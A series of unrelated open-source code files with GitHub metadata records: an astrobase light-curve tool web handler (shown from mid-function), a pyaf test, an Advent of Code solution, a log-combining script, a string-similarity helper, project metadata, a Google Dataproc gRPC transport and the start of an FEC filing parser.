lctoolargs[6], # period
magsarefluxes=lctoolkwargs['magsarefluxes'],
sigclip=None,
verbose=True
)
# set the epoch correctly now for the plot
lctoolargs[-1] = spfit['fitinfo']['fitepoch']
if len(spfit['fitinfo']['fitepoch']) != 1:
lctoolargs[-1] = (
spfit['fitinfo']['fitepoch'][0]
)
# if the spline fit fails, use the minimum of times
# as epoch as usual
except Exception:
LOGGER.exception(
'spline fit failed, '
'using min(times) as epoch'
)
lctoolargs[-1] = np.min(stimes)
# now run the phased LC function with provided args,
# kwargs
# final times, mags, errs
lctoolargs[3] = stimes
lctoolargs[4] = smags
lctoolargs[5] = serrs
# the sigclip kwarg isn't used here since we did this
# already earlier
del lctoolkwargs['sigclip']
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict)):
if periodind in tempcpdict[lspmethod]:
tempcpdict[lspmethod][periodind] = (
funcresults
)
else:
tempcpdict[lspmethod].update(
{periodind: funcresults}
)
else:
tempcpdict[lspmethod] = {periodind: funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
' because readonly = True'
)
#
# assemble the return dict
#
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
retkey = 'phasedlc%s' % periodind
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
retkey:funcresults
}
}
self.write(resultdict)
self.finish()
# if the lctool is var-varfeatures
elif lctool == 'var-varfeatures':
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
'varinfo' in tempcpdict and
isinstance(tempcpdict['varinfo'], dict) and
'varfeatures' in tempcpdict['varinfo'] and
isinstance(tempcpdict['varinfo']['varfeatures'], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
'varinfo': {
'varfeatures': (
tempcpdict['varinfo']['varfeatures']
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if ('varinfo' in tempcpdict and
isinstance(tempcpdict['varinfo'], dict)):
if 'varfeatures' in tempcpdict['varinfo']:
tempcpdict['varinfo']['varfeatures'] = (
funcresults
)
else:
tempcpdict['varinfo'].update(
{'varfeatures': funcresults}
)
else:
tempcpdict['varinfo'] = {'varfeatures':
funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
' because readonly = True'
)
#
# assemble the return dict
#
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
'varinfo':{
'varfeatures':funcresults
}
}
self.write(resultdict)
self.finish()
# if the lctool is var-prewhiten or var-masksig
elif lctool in ('var-prewhiten','var-masksig'):
key1, key2 = resloc
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
key1 in tempcpdict and
isinstance(tempcpdict[key1], dict) and
key2 in tempcpdict[key1] and
isinstance(tempcpdict[key1][key2], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1: {
key2: (
tempcpdict[key1][key2]
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
# send in a stringio object for the fitplot kwarg
lctoolkwargs['plotfit'] = StrIO()
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# we turn the returned fitplotfile fd into a base64
# encoded string after reading it
fitfd = funcresults['fitplotfile']
fitfd.seek(0)
fitbin = fitfd.read()
fitb64 = base64.b64encode(fitbin)
fitfd.close()
funcresults['fitplotfile'] = fitb64
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (key1 in tempcpdict and
isinstance(tempcpdict[key1], dict)):
if key2 in tempcpdict[key1]:
tempcpdict[key1][key2] = (
funcresults
)
else:
tempcpdict[key1].update(
{key2: funcresults}
)
else:
tempcpdict[key1] = {key2: funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
' because readonly = True'
)
#
# assemble the return dict
#
# for this operation, we'll return:
# - fitplotfile
fitreturndict = {'fitplotfile':fitb64}
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1:{
key2:fitreturndict
}
}
self.write(resultdict)
self.finish()
# if the lctool is a lcfit method
elif lctool in ('lcfit-fourier',
'lcfit-spline',
'lcfit-legendre',
'lcfit-savgol'):
key1, key2 = resloc
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
key1 in tempcpdict and
isinstance(tempcpdict[key1], dict) and
key2 in tempcpdict[key1] and
isinstance(tempcpdict[key1][key2], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
# these are the full results
phasedfitlc = tempcpdict[key1][key2]
# we only want a few things from them
fitresults = {
'method':phasedfitlc['lcfit']['fittype'],
'chisq':phasedfitlc['lcfit']['fitchisq'],
'redchisq':phasedfitlc['lcfit']['fitredchisq'],
'period':phasedfitlc['period'],
'epoch':phasedfitlc['epoch'],
'plot':phasedfitlc['plot'],
}
# add fitparams if there are any
if ('finalparams' in phasedfitlc['lcfit']['fitinfo'] and
phasedfitlc['lcfit']['fitinfo']['finalparams']
is not None):
fitresults['fitparams'] = (
phasedfitlc['lcfit']['fitinfo']['finalparams']
)
# this is the final result object
resultdict['result'] = {
'objectid':objectid,
key1: {
key2: (
fitresults
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# now that we have the fit results, generate a fitplot.
# these args are for the special fitplot mode of
# _pkl_phased_magseries_plot
phasedlcargs = (None,
'lcfit',
-1,
cptimes,
cpmags,
cperrs,
lctoolargs[3], # this is the fit period
'min')
# here, we set a bestperiodhighlight to distinguish this
# plot from the ones existing in the checkplot already
# also add the overplotfit information
phasedlckwargs = {
'xliminsetmode':False,
'magsarefluxes':lctoolkwargs['magsarefluxes'],
'bestperiodhighlight':'#defa75',
'overplotfit':funcresults
}
# dispatch the plot function
phasedlc = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs,
**phasedlckwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (key1 in tempcpdict and
isinstance(tempcpdict[key1], dict)):
if key2 in tempcpdict[key1]:
tempcpdict[key1][key2] = (
phasedlc
)
else:
tempcpdict[key1].update(
{key2: phasedlc}
)
else:
tempcpdict[key1] = {key2: phasedlc}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
' because readonly = True'
)
#
# assemble the return dict
#
fitresults = {
'method':phasedlc['lcfit']['fittype'],
'chisq':phasedlc['lcfit']['fitchisq'],
'redchisq':phasedlc['lcfit']['fitredchisq'],
'period':phasedlc['period'],
'epoch':phasedlc['epoch'],
'plot':phasedlc['plot'],
}
# add fitparams if there are any
if ('finalparams' in funcresults['fitinfo'] and
funcresults['fitinfo']['finalparams'] is not None):
fitresults['fitparams'] = (
funcresults['fitinfo']['finalparams']
)
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1:{
key2:fitresults
}
}
self.write(resultdict)
self.finish()
# if this is the special lcfit subtract tool
elif lctool == 'lcfit-subtract':
fitmethod, periodind = lctoolargs
# find the fit requested
# subtract it from the cptimes, cpmags, cperrs
# if not readonly, write back to cptimes, cpmags, cperrs
# make a new phasedlc plot for the current periodind using
# these new cptimes, cpmags, cperrs
# return this plot
# if this is the special full reset tool
elif lctool == 'lctool-reset':
if os.path.exists(tempfpath):
os.remove(tempfpath)
LOGGER.warning('reset all LC tool results '
'for %s by removing %s' %
(tempfpath, cpfpath))
resultdict['status'] = 'success'
else:
resultdict['status'] = 'error'
LOGGER.warning('tried to reset LC tool results for %s, '
'but temp checkplot result pickle %s '
'does not exist' %
(tempfpath, cpfpath))
resultdict['message'] = (
'all unsynced results for this object have been purged'
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
self.finish()
# if this is the special load results tool
elif lctool == 'lctool-results':
target = self.get_argument('resultsfor',None)
if target is not None:
target = xhtml_escape(target)
# get rid of invalid targets
if (target not in CPTOOLMAP or
target == 'lctool-reset' or
target == 'lctool-results' or
target == 'phasedlc-newplot' or
target == 'lcfit-subtract'):
LOGGER.error("can't get results for %s" % target)
resultdict['status'] = 'error'
resultdict['message'] = (
"can't get results for %s" % target
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if we're good to go, get the target location
targetloc = CPTOOLMAP[target]['resloc']
# first, search the cptempdict for this target
# if found, return it
# second, search the actual cpdict for this target
# if found, return it
# otherwise, we're being asked for everything
# return the whole
else:
pass
# otherwise, this is an unrecognized lctool
else:
LOGGER.error('lctool %s, does not exist' % lctool)
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s does not exist' % lctool
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if the cpfile doesn't exist
else:
LOGGER.error('could not find %s' % self.cpfile)
resultdict = {'status':'error',
'message':"This checkplot doesn't exist.",
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
# if no checkplot was provided to load
else:
resultdict = {'status':'error',
'message':'No checkplot provided to load.',
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
def post(self, cpfile):
'''This handles a POST request.
TODO: implement this.
This will save the results of the previous tool run to the checkplot
file and the JSON filelist.
This is only called when the user explicitly clicks on the 'permanently
update checkplot with results' button. If the server is in readonly
mode, this has no effect.
This will copy everything from the '.pkl-cpserver-temp' file to the
actual checkplot pickle and then remove that file.
'''
| {
"content_hash": "89a68bad951a2b39257705ded9a12c34",
"timestamp": "",
"source": "github",
"line_count": 1814,
"max_line_length": 80,
"avg_line_length": 40.52370452039691,
"alnum_prop": 0.36069922459529313,
"repo_name": "waqasbhatti/astrobase",
"id": "c1f527412a4fffb4b925eed592c221419e30348b",
"size": "73676",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "astrobase/cpserver/checkplotserver_toolhandlers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3584"
},
{
"name": "Dockerfile",
"bytes": "891"
},
{
"name": "HTML",
"bytes": "61470"
},
{
"name": "JavaScript",
"bytes": "171219"
},
{
"name": "Python",
"bytes": "2748532"
}
],
"symlink_target": ""
} |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "BoxCox", sigma = 0.0, exog_count = 100, ar_order = 12); | {
"content_hash": "0c3493ee37669ed59ace99580a66bc9d",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 163,
"avg_line_length": 37.57142857142857,
"alnum_prop": 0.7034220532319392,
"repo_name": "antoinecarme/pyaf",
"id": "db61d13dbddfe3e3172f9b71a6dd9b7fdef2f07a",
"size": "263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/artificial/transf_BoxCox/trend_Lag1Trend/cycle_12/ar_12/test_artificial_32_BoxCox_Lag1Trend_12_12_100.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
} |
""" Solution to the second puzzle of Day 9 on adventofcode.com
"""
import os
from itertools import permutations
def main():
""" Optimize Santa's route!
"""
basedir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(basedir, 'input')
cities = {}
with open(file_path, 'r') as input_file:
for line in [ raw_line.strip() for raw_line in input_file ]:
pieces = line.split(' ')
(start, end, dist) = (pieces[0], pieces[2], pieces[4])
if start not in cities:
cities[start] = {}
if end not in cities:
cities[end] = {}
if end not in cities[start]:
cities[start][end] = int(dist)
if start not in cities[end]:
cities[end][start] = int(dist)
best_route = None
best_length = 0
for route in permutations(cities.keys()):
length = 0
for route_pos, start in enumerate(route[:-1]):
length += cities[start][route[route_pos+1]]
if length > best_length:
best_route = route
best_length = length
print "{} = {}".format(' -> '.join(best_route), best_length)
assert best_length == 804
if __name__ == '__main__':
main()
| {
"content_hash": "55fca3e9f8a8fe00ed073ce43ce9b800",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 68,
"avg_line_length": 25.6,
"alnum_prop": 0.53515625,
"repo_name": "JPinSPACE/AdventOfCode",
"id": "9a6561a1664c95e5bc53eff0f26ebd6e8a7eeb71",
"size": "1280",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "day09/02_inefficient_santa/solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1129"
},
{
"name": "Python",
"bytes": "75738"
}
],
"symlink_target": ""
} |
"""Combine logs from multiple bitcoin nodes as well as the test_framework log.
This streams the combined log output to stdout. Use combine_logs.py > outputfile
to write to an outputfile."""
import argparse
from collections import defaultdict, namedtuple
import glob
import heapq
import itertools
import os
import re
import sys
# Matches on the date format at the start of the log event
TIMESTAMP_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}Z")
LogEvent = namedtuple('LogEvent', ['timestamp', 'source', 'event'])
def main():
"""Main function. Parses args, reads the log files and renders them as text or html."""
parser = argparse.ArgumentParser(usage='%(prog)s [options] <test temporary directory>', description=__doc__)
parser.add_argument('-c', '--color', dest='color', action='store_true', help='outputs the combined log with events colored by source (requires posix terminal colors. Use less -r for viewing)')
parser.add_argument('--html', dest='html', action='store_true', help='outputs the combined log as html. Requires jinja2. pip install jinja2')
args, unknown_args = parser.parse_known_args()
if args.color and os.name != 'posix':
print("Color output requires posix terminal colors.")
sys.exit(1)
if args.html and args.color:
print("Only one out of --color or --html should be specified")
sys.exit(1)
# There should only be one unknown argument - the path of the temporary test directory
if len(unknown_args) != 1:
print("Unexpected arguments" + str(unknown_args))
sys.exit(1)
log_events = read_logs(unknown_args[0])
print_logs(log_events, color=args.color, html=args.html)
def read_logs(tmp_dir):
"""Reads log files.
Delegates to generator function get_log_events() to provide individual log events
for each of the input log files."""
# Find out what the folder is called that holds the debug.log file
chain = glob.glob("{}/node0/*/debug.log".format(tmp_dir))
if chain:
chain = chain[0] # pick the first one if more than one chain was found (should never happen)
chain = re.search('node0/(.+?)/debug\.log$', chain).group(1) # extract the chain name
else:
chain = 'regtest' # fallback to regtest (should only happen when none exists)
files = [("test", "%s/test_framework.log" % tmp_dir)]
for i in itertools.count():
logfile = "{}/node{}/{}/debug.log".format(tmp_dir, i, chain)
if not os.path.isfile(logfile):
break
files.append(("node%d" % i, logfile))
return heapq.merge(*[get_log_events(source, f) for source, f in files])
def get_log_events(source, logfile):
"""Generator function that returns individual log events.
Log events may be split over multiple lines. We use the timestamp
regex match as the marker for a new log event."""
try:
with open(logfile, 'r', encoding='utf-8') as infile:
event = ''
timestamp = ''
for line in infile:
# skip blank lines
if line == '\n':
continue
# if this line has a timestamp, it's the start of a new log event.
time_match = TIMESTAMP_PATTERN.match(line)
if time_match:
if event:
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
event = line
timestamp = time_match.group()
# if it doesn't have a timestamp, it's a continuation line of the previous log.
else:
event += "\n" + line
# Flush the final event
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
except FileNotFoundError:
print("File %s could not be opened. Continuing without it." % logfile, file=sys.stderr)
def print_logs(log_events, color=False, html=False):
"""Renders the iterator of log events into text or html."""
if not html:
colors = defaultdict(lambda: '')
if color:
colors["test"] = "\033[0;36m" # CYAN
colors["node0"] = "\033[0;34m" # BLUE
colors["node1"] = "\033[0;32m" # GREEN
colors["node2"] = "\033[0;31m" # RED
colors["node3"] = "\033[0;33m" # YELLOW
colors["reset"] = "\033[0m" # Reset font color
for event in log_events:
print("{0} {1: <5} {2} {3}".format(colors[event.source.rstrip()], event.source, event.event, colors["reset"]))
else:
try:
import jinja2
except ImportError:
print("jinja2 not found. Try `pip install jinja2`")
sys.exit(1)
print(jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(os.path.abspath(__file__))))
.get_template('combined_log_template.html')
.render(title="Combined Logs from testcase", log_events=[event._asdict() for event in log_events]))
if __name__ == '__main__':
main()
| {
"content_hash": "2b260e00d3b6872f107530456c438fd6",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 196,
"avg_line_length": 41.81147540983606,
"alnum_prop": 0.6112526955498921,
"repo_name": "biblepay/biblepay",
"id": "caa8c9c5bcc026b822461813883e3f8d680cf840",
"size": "5124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/combine_logs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "82631"
},
{
"name": "C",
"bytes": "1676673"
},
{
"name": "C++",
"bytes": "9008941"
},
{
"name": "CMake",
"bytes": "14553"
},
{
"name": "CSS",
"bytes": "211795"
},
{
"name": "Dockerfile",
"bytes": "655"
},
{
"name": "GDB",
"bytes": "444"
},
{
"name": "HTML",
"bytes": "21860"
},
{
"name": "Java",
"bytes": "30291"
},
{
"name": "M4",
"bytes": "199753"
},
{
"name": "Makefile",
"bytes": "130183"
},
{
"name": "Objective-C++",
"bytes": "6210"
},
{
"name": "PowerShell",
"bytes": "3455"
},
{
"name": "Python",
"bytes": "1428152"
},
{
"name": "QMake",
"bytes": "874"
},
{
"name": "Ruby",
"bytes": "3540"
},
{
"name": "Sage",
"bytes": "30188"
},
{
"name": "Shell",
"bytes": "93826"
},
{
"name": "TypeScript",
"bytes": "7705936"
}
],
"symlink_target": ""
} |
import jellyfish
def extract_closest_match(search_key, target_list, score_cutoff=0):
"""Return str value from target list with highest score using Jaro
for String distance.
search_key (str): A string used to search for closest match.
target_list (list): A list of strings for comparison.
score_cutoff (float): A score cutoff (betwen 0 and 1) to be met.
"""
highest_score = score_cutoff
highest_value_key = None
for target_key in target_list:
score = jellyfish.jaro_similarity(search_key, target_key)
if score >= highest_score:
highest_score = score
highest_value_key = target_key
return highest_value_key
| {
"content_hash": "e9c52683815830891e4a49e04c16c4f5",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 70,
"avg_line_length": 33,
"alnum_prop": 0.6695526695526696,
"repo_name": "GoogleCloudPlatform/professional-services-data-validator",
"id": "9d5ae2b7d7683f8905a4216468a02525f67ecfe2",
"size": "1269",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "data_validation/jellyfish_distance.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HCL",
"bytes": "2694"
},
{
"name": "Python",
"bytes": "396721"
},
{
"name": "Shell",
"bytes": "9068"
}
],
"symlink_target": ""
} |
"""Project metadata
Information describing the project.
"""
# The package name, which is also the "UNIX name" for the project.
package = 'lupin'
project = "Project Lupin"
project_no_spaces = project.replace(' ', '')
version = '0.1'
description = 'A module for tracking eyeball movements'
authors = ['Krishna Bagadia', 'Abinash Meher']
authors_string = ', '.join(authors)
emails = ['krishna.bagadia2@gmail.com', 'abinashdakshana999@gmail.com']
license = 'MIT'
copyright = '2015 ' + authors_string
url = 'http://github.com/krishna95/lupin'
| {
"content_hash": "b73d427f5c1d7762376d120d80b17000",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 71,
"avg_line_length": 31.764705882352942,
"alnum_prop": 0.7166666666666667,
"repo_name": "krishna95/lupin",
"id": "bde45ed4cc8672b84e8ec9c2da329143626387e5",
"size": "564",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lupin/metadata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19629"
}
],
"symlink_target": ""
} |
import google.api_core.grpc_helpers
import google.api_core.operations_v1
from google.cloud.dataproc_v1.proto import clusters_pb2_grpc
class ClusterControllerGrpcTransport(object):
"""gRPC transport class providing stubs for
google.cloud.dataproc.v1 ClusterController API.
The transport provides access to the raw gRPC stubs,
which can be used to take advantage of advanced
features of gRPC.
"""
# The scopes needed to make gRPC calls to all of the methods defined
# in this service.
_OAUTH_SCOPES = ('https://www.googleapis.com/auth/cloud-platform', )
def __init__(self,
channel=None,
credentials=None,
address='dataproc.googleapis.com:443'):
"""Instantiate the transport class.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
address (str): The address where the service is hosted.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments are mutually '
'exclusive.', )
# Create the channel.
if channel is None:
channel = self.create_channel(
address=address,
credentials=credentials,
)
self._channel = channel
# gRPC uses objects called "stubs" that are bound to the
# channel and provide a basic method for each RPC.
self._stubs = {
'cluster_controller_stub':
clusters_pb2_grpc.ClusterControllerStub(channel),
}
# Because this API includes a method that returns a
# long-running operation (proto: google.longrunning.Operation),
# instantiate an LRO client.
self._operations_client = google.api_core.operations_v1.OperationsClient(
channel)
@classmethod
def create_channel(cls,
address='dataproc.googleapis.com:443',
credentials=None):
"""Create and return a gRPC channel object.
Args:
address (str): The host for the channel to use.
credentials (~.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
Returns:
grpc.Channel: A gRPC channel object.
"""
return google.api_core.grpc_helpers.create_channel(
address,
credentials=credentials,
scopes=cls._OAUTH_SCOPES,
)
@property
def channel(self):
"""The gRPC channel used by the transport.
Returns:
grpc.Channel: A gRPC channel object.
"""
return self._channel
@property
def create_cluster(self):
"""Return the gRPC stub for {$apiMethod.name}.
Creates a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].CreateCluster
@property
def update_cluster(self):
"""Return the gRPC stub for {$apiMethod.name}.
Updates a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].UpdateCluster
@property
def delete_cluster(self):
"""Return the gRPC stub for {$apiMethod.name}.
Deletes a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].DeleteCluster
@property
def get_cluster(self):
"""Return the gRPC stub for {$apiMethod.name}.
Gets the resource representation for a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].GetCluster
@property
def list_clusters(self):
"""Return the gRPC stub for {$apiMethod.name}.
Lists all regions/{region}/clusters in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].ListClusters
@property
def diagnose_cluster(self):
"""Return the gRPC stub for {$apiMethod.name}.
Gets cluster diagnostic information. After the operation completes, the
Operation.response field contains ``DiagnoseClusterOutputLocation``.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].DiagnoseCluster
| {
"content_hash": "f4307f4960a905a19858d07647ba2001",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 81,
"avg_line_length": 35.39080459770115,
"alnum_prop": 0.6146476128613186,
"repo_name": "jonparrott/gcloud-python",
"id": "c9ce91b99ee0decfad26c34c39e99d60b52959c4",
"size": "6760",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dataproc/google/cloud/dataproc_v1/gapic/transports/cluster_controller_grpc_transport.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3459300"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
} |
from time import time
from sys import argv
script, filename = argv
alphabet = list("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
for x in range(1, 27):
alphabet[x-1] = (alphabet[x-1], x)
opened = open(filename)
listed = opened.read().split(",")
for i in range(0, len(listed)):
listed[i] = listed[i][1:-1]
sort = sorted(listed)
def names_scores():
total = 0
for index, value in enumerate(sort):
word = list(value)
for index2, letter in enumerate(word):
for x in alphabet:
if letter == x[0]:
word[index2] = x[1]
sort[index] = word
individual_score = (index+1)*sum(sort[index])
total += individual_score
return total
print(names_scores())
| {
"content_hash": "30a5bc425878289102db16b9ba161286",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 47,
"avg_line_length": 20.352941176470587,
"alnum_prop": 0.6329479768786127,
"repo_name": "kayson-hansen/Project-Euler",
"id": "c977017c768c88ab8d5da5c48d978d01c1b51bda",
"size": "692",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/022_names_scores.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "5321"
},
{
"name": "Python",
"bytes": "38841"
},
{
"name": "Ruby",
"bytes": "6551"
}
],
"symlink_target": ""
} |
import sys, time, os
sys.path.append('../../')
from parsing.filing import filing
from parsing.form_parser import form_parser, ParserMissingError
from fec_alerts.utils.form_mappers import *
from write_csv_to_db import CSV_dumper
from fec_import_logging import fec_logger
from hstore_helpers import dict_to_hstore
from db_utils import get_connection
verbose = True
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fecreader.settings")
from django.conf import settings
from fec_alerts.models import new_filing
from formdata.models import SkedE
class FilingHeaderDoesNotExist(Exception):
pass
class FilingHeaderAlreadyProcessed(Exception):
pass
def process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id):
form = linedict['form_parser']
## Mark memo-ized rows as being superceded by an amendment.
try:
if linedict['memo_code']=='X':
linedict['superceded_by_amendment'] = True
except KeyError:
pass
#print "processing form type: %s" % (form)
if form=='SchA':
skeda_from_skedadict(linedict, filingnum, header_id, is_amended, cd)
elif form=='SchB':
skedb_from_skedbdict(linedict, filingnum, header_id, is_amended, cd)
elif form=='SchE':
skede_from_skededict(linedict, filingnum, header_id, is_amended, cd)
# Treat 48-hour contribution notices like sked A.
# Requires special handling for amendment, since these are superceded
# by regular F3 forms.
elif form=='F65':
skeda_from_f65(linedict, filingnum, header_id, is_amended, cd)
# disclosed donor to non-commmittee. Sorta rare, but..
elif form=='F56':
skeda_from_f56(linedict, filingnum, header_id, is_amended, cd)
# disclosed electioneering donor
elif form=='F92':
skeda_from_f92(linedict, filingnum, header_id, is_amended, cd)
# inaugural donors
elif form=='F132':
skeda_from_f132(linedict, filingnum, header_id, is_amended, cd)
#inaugural refunds
elif form=='F133':
skeda_from_f133(linedict, filingnum, header_id, is_amended, cd)
# IE's disclosed by non-committees. Note that they use this for * both * quarterly and 24- hour notices. There's not much consistency with this--be careful with superceding stuff.
elif form=='F57':
skede_from_f57(linedict, filingnum, header_id, is_amended, cd)
# Its another kind of line. Just dump it in Other lines.
else:
otherline_from_line(linedict, filingnum, header_id, is_amended, cd, filer_id)
def process_filing_body(filingnum, fp=None, logger=None):
#It's useful to pass the form parser in when running in bulk so we don't have to keep creating new ones.
if not fp:
fp = form_parser()
if not logger:
logger=fec_logger()
msg = "process_filing_body: Starting # %s" % (filingnum)
#print msg
logger.info(msg)
connection = get_connection()
cursor = connection.cursor()
